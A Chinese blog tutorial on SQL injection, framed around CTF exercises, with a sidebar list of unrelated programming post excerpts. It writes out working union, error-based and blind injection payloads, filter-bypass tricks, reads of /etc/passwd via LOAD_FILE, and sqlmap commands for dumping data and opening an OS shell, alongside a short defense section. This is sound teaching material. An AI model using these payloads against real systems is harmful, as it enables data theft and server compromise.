当前位置：首页 > news >正文

SQL注入（SQL Injection）详解与实战

news 2026/2/9 2:16:30

文章目录

- 一、什么是SQL注入？
- 二、常见SQL注入类型
- 三、手动注入步骤（以CTF题目为例）
- 四、CTF实战技巧
- 五、自动化工具：SQLMap
- 六、防御措施
- 七、CTF例题
- 八、资源推荐

一、什么是SQL注入？

SQL注入是一种通过用户输入构造恶意SQL语句，干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。

二、常见SQL注入类型

联合查询注入（Union-Based）
利用UNION SELECT拼接查询结果，直接回显数据。

' UNION SELECT username, password FROM users--
报错注入（Error-Based）
通过触发数据库报错泄露信息（如MySQL的updatexml或extractvalue）。

' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--
布尔盲注（Boolean-Based Blind）
通过页面返回的真假状态推断数据（如返回内容差异或HTTP状态码）。

' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--
时间盲注（Time-Based Blind）
通过延时响应判断条件是否成立（如MySQL的sleep()）。

' AND IF(1=1, SLEEP(5), 0)--

三、手动注入步骤（以CTF题目为例）

检测注入点
- 输入单引号'触发数据库错误（如You have an error in your SQL syntax）。
- 测试逻辑条件：
  
  id=1' AND 1=1-- （页面正常） id=1' AND 1=2-- （页面异常）
确定字段数（ORDER BY）

' ORDER BY 3-- （无报错） ' ORDER BY 4-- （报错→字段数为3）
联合查询获取数据

' UNION SELECT 1,2,3-- （确定回显位） ' UNION SELECT database(), user(), version()--
提取表名与列名

' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--
获取敏感数据

' UNION SELECT 1, username, password FROM users--

四、CTF实战技巧

绕过过滤
- 大小写绕过：UnIoN SeLeCt（部分过滤器不区分大小写）。
- 注释符：-- （空格）、#、/*...*/。
- 编码绕过：URL编码（%27代替'）、十六进制（0x...）。
- 空格绕过：用/**/或+代替空格（如UNION/**/SELECT）。
利用字符串拼接
- MySQL：'||'1'='1' → ' OR '1'='1。
- SQLite：'||1=1-- 。
利用数据库特性
- MySQL：LOAD_FILE('/etc/passwd')读取文件。
- PostgreSQL：pg_read_file('/etc/passwd')。
- SQLite：sqlite_version()获取版本。

五、自动化工具：SQLMap

基本用法

sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据
高级参数
- --level=3：提高检测等级（包含Cookie注入）。
- --risk=3：允许高风险操作（如文件写入）。
- --os-shell：尝试获取系统Shell（需高权限）。

六、防御措施

参数化查询（预编译）

Python

# Python示例（使用SQLAlchemy） result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})
输入过滤
- 过滤特殊字符（' " ; --）。
- 限制输入类型（如数字类型强制转换为整数）。
最小权限原则
- 数据库用户仅授予必要权限（禁止FILE、EXECUTE等）。

七、CTF例题

题目：登录页面存在SQL注入，获取管理员密码。

SQL

' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--
题目：过滤了空格和UNION，利用盲注获取数据。

SQL

'||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#

八、资源推荐

练习平台：
- PortSwigger SQLi Labs（https://portswigger.net/web-security/sql-injection）
- SQLi Labs（GitHub开源靶场）
深入阅读：
- 《SQL注入攻击与防御（第2版）》
- OWASP SQL Injection Cheat Sheet

SQL注入（SQL Injection）详解与实战

文章目录一、什么是SQL注入？二、常见SQL注入类型三、手动注入步骤（以CTF题目为例）四、CTF实战技巧五、自动化工具：SQLMap六、防御措施七、CTF例题八、资源推荐一、什么是SQL注入？ SQL注入是一种通过用户输入构造恶意…...

编程日记 2025/2/18 16:43:22

【Prometheus】prometheus结合domain_exporter实现域名监控

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯，先赞后看哦~🎈🎈 🏆 作者简介：景天科技苑 🏆《头衔》：大厂架构师，华为云开发者社区专家博主，阿里云开发者社区专家博主，CSDN全栈领域优质创作者，掘金优秀博主，51CTO博客专家等。 🏆《博客》：Python全…...

编程日记 2025/2/18 16:42:20

Java 设计模式之命令模式

文章目录 Java 设计模式之命令模式概述UML代码实现简单实现复杂实现 Java 设计模式之命令模式概述命令模式(Command)：将一个请求封装为一个对象，从而使你可用不同的请求对客户进行参数化；对请求排队或记录请求日志，以及支持可…...

编程日记 2025/2/18 16:41:16

BT401双模音频蓝牙模块如何开启ble的透传,有什么注意事项

BT401音频蓝牙模块如何开启ble的透传？ 首先BT401的蓝牙音频模块，分为两个版本，dac版本和iis数字音频版本 DAC版本：就是BT401蓝牙模块【9和10脚】直接输出模拟音频信号，也就是说，直接推动耳机可以听到声音 …...

编程日记 2025/2/18 16:39:13

一、布尔盲注： import requestsdef binary_search_character(url, query, index, low32, high127):while low < high:mid (low high 1) // 2payload f"1 AND ASCII(SUBSTRING(({query}),{index},1)) > {mid} -- "res {"id": payloa…...

编程日记 2025/2/18 16:37:10

Vue 项目登录的基本流程

Vue 用户登录的基本流程包括以下6个步骤： 步骤： 1. 创建登录表单在前端，首先要创建一个登录表单，用户输入账号（用户名、邮箱、手机号等）和密码。示例：Login.vue <template><div…...

编程日记 2025/2/18 16:34:04

kubernetes源码分析 kubelet

简介从官方的架构图中很容易就能找到 kubelet 执行 kubelet -h 看到 kubelet 的功能介绍： kubelet 是每个 Node 节点上都运行的主要“节点代理”。使用如下的一个向 apiserver 注册 Node 节点：主机的 hostname；覆盖 host 的参数&#xff1…...

编程日记 2025/2/18 16:27:53

Web3 开发者周刊 36 | 构建自主未来：Agent、可扩展性与赏金

欢迎来到 Web3 开发者周刊 36，这里汇聚了赋能您的 Web3 构建之旅的各种资源。本周我们将剖析基于Agent的系统，讨论来自 Vitalik 关于以太坊 L1 和 L2 的最新思考，并提供最新高价值Bounty消息。开始Build吧！ ✅ One Trillion Age…...

编程日记 2025/2/18 16:24:48

零基础入门机器学习 -- 第十一章机器学习模型的评估与优化

如何判断你的模型到底行不行？ 11.1 为什么需要评估模型？ 场景设定：信用卡欺诈检测想象你是ABC银行的风控经理，你每天的工作就是盯着上百万笔交易，防止客户的信用卡被盗刷。你们银行新推出了一款机器学习模型&…...

编程日记 2025/2/18 16:18:38

菜鸟之路Day15一一IO流(一)

菜鸟之路Day15一一IO流（一） 作者：blue 时间：2025.2.8 文章目录菜鸟之路Day15一一IO流（一）0.概述1.初识IO流1.1.什么是IO流？1.2.IO流的作用1.3.IO流的分类 2.IO流的体系结构3.字节输出流的基本…...

编程日记 2025/2/18 16:14:28

动手学Agent——Day2

文章目录一、用 Llama-index 创建 Agent1. 测试模型2. 自定义一个接口类3. 使用 ReActAgent & FunctionTool 构建 Agent 二、数据库对话 Agent1. SQLite 数据库1.1 创建数据库 & 连接1.2 创建、插入、查询、更新、删除数据1.3 关闭连接建立数据库 2. ollama3. 配置对话…...

编程日记 2025/2/18 16:08:11

JSONObject,TreeUtil,EagelMap,BeanUtil使用

目录 JSONObject的使用 TreeUtil的使用 EagleMap使用安装 application.yml配置 springboot导入依赖配置信息简单使用如果想获取这个json字符串里面的distance的值 BeanUtil拷贝注意 JSONObject的使用假如我现在要处理这样的json数据可以直接使用JSONUtil.parseObj…...

编程日记 2025/2/18 15:59:59

Unity嵌入到Winform

Unity嵌入到Winform Winform工程🌈...

编程日记 2025/2/18 15:56:55

TCP/UDP协议与OSI七层模型的关系解析| HTTPS与HTTP安全性深度思考》

目录 OSI 7层模型每一层包含的协议： TCP和UDP协议： TCP (Transmission Control Protocol)： UDP (User Datagram Protocol)： 数据包流程图 TCP与UDP的区别： 传输层与应用层的关联传输层和应用层的关联&#xf…...

编程日记 2025/2/18 15:55:50

《Zookeeper 分布式过程协同技术详解》读书笔记-2

目录 zk的一些内部原理和应用请求，事务和标识读写操作事务标识（zxid） 群首选举Zab协议（ZooKeeper Atomic Broadcast protocol）文件系统和监听通知机制分布式配置中心, 简单Demojava code 集群管理code 分布式锁 zk的一…...

编程日记 2025/2/18 15:53:46

缺陷检测之图片标注工具--labme

一、labelme简介 Labelme是开源的图像标注工具，常用做检测，分割和分类任务的图像标注。它的功能很多，包括： 对图像进行多边形，矩形，圆形，多段线，线段，点形式的标注&a…...

编程日记 2025/2/18 15:51:41

机器学习_13 决策树知识总结

决策树是一种直观且强大的机器学习算法，广泛应用于分类和回归任务。它通过树状结构的决策规则来建模数据，易于理解和解释。今天，我们就来深入探讨决策树的原理、实现和应用。一、决策树的基本概念 1.1 决策树的工作原理决策树是一种基于…...

编程日记 2025/2/18 15:49:33

请解释一下Standford Alpaca格式、sharegpt数据格式-------deepseek问答记录

1 Standford Alpaca格式 json格式数据。Stanford Alpaca 格式是一种用于训练和评估自然语言处理（NLP）模型的数据格式，特别是在指令跟随任务中。它由斯坦福大学的研究团队开发，旨在帮助模型理解和执行自然语言指令。以下是该格式的…...

编程日记 2025/2/18 15:47:22

ubuntu 安装管理多版本python3 相关问题解决

背景：使用ubuntu 22.04 默认python 未3.10.编译一些模块的时候发现需要降级到python3.9.于是下载安装下载： wget https://www.python.org/ftp/python/3.9.16/Python-3.9.16.tgz解压与编译 tar -xf Python-3.9.16.tgz cd Python-3.9.16 ./configure -…...

编程日记 2025/2/18 15:46:19

滑动窗口算法篇：连续子区间与子串问题

1.滑动窗口原理那么一谈到子区间的问题，我们可能会想到我们可以用我们的前缀和来应用子区间问题，但是这里对于子区间乃至子串问题，我们也可以尝试往滑动窗口的思路方向去进行一个尝试，那么说那么半天，滑动窗口是什么…...

编程日记 2025/2/18 15:39:03

Mybatis逆向工程，动态创建实体类、条件扩展类、Mapper接口、Mapper.xml映射文件

今天呢，博主的学习进度也是步入了Java Mybatis 框架，目前正在逐步杨帆旗航。那么接下来就给大家出一期有关 Mybatis 逆向工程的教学，希望能对大家有所帮助，也特别欢迎大家指点不足之处，小生很乐意接受正确的建议&…...

编程新知 2026/1/31 15:00:15

【网络安全产品大调研系列】2. 体验漏洞扫描

前言 2023 年漏洞扫描服务市场规模预计为 3.06（十亿美元）。漏洞扫描服务市场行业预计将从 2024 年的 3.48（十亿美元）增长到 2032 年的 9.54（十亿美元）。预测期内漏洞扫描服务市场 CAGR（增长率&…...

编程新知 2026/2/4 12:43:08

五年级数学知识边界总结思考-下册

目录一、背景二、过程1.观察物体小学五年级下册“观察物体”知识点详解：由来、作用与意义**一、知识点核心内容****二、知识点的由来：从生活实践到数学抽象****三、知识的作用：解决实际问题的工具****四、学习的意义：培养核心素养…...

编程新知 2025/10/7 4:57:55

屋顶变身“发电站” ，中天合创屋面分布式光伏发电项目顺利并网！

5月28日，中天合创屋面分布式光伏发电项目顺利并网发电，该项目位于内蒙古自治区鄂尔多斯市乌审旗，项目利用中天合创聚乙烯、聚丙烯仓库屋面作为场地建设光伏电站，总装机容量为9.96MWp。项目投运后，每年可节约标煤3670…...

编程新知 2026/1/30 2:45:51

相机从app启动流程

一、流程框架图二、具体流程分析 1、得到cameralist和对应的静态信息目录如下：重点代码分析：启动相机前，先要通过getCameraIdList获取camera的个数以及id，然后可以通过getCameraCharacteristics获取对应id camera的capabilities（静态信息）进行一些openCamera前的…...

编程新知 2026/1/31 5:09:19

QT： `long long` 类型转换为 `QString` 2025.6.5

在 Qt 中，将 long long 类型转换为 QString 可以通过以下两种常用方法实现： 方法 1：使用 QString::number() 直接调用 QString 的静态方法 number()，将数值转换为字符串： long long value 1234567890123456789LL; …...

编程新知 2026/2/1 6:30:04

vue3+vite项目中使用.env文件环境变量方法

vue3vite项目中使用.env文件环境变量方法 .env文件作用命名规则常用的配置项示例使用方法注意事项在vite.config.js文件中读取环境变量方法 .env文件作用 .env 文件用于定义环境变量，这些变量可以在项目中通过 import.meta.env 进行访问。Vite 会自动加载这些环境变…...

编程新知 2026/1/26 19:12:01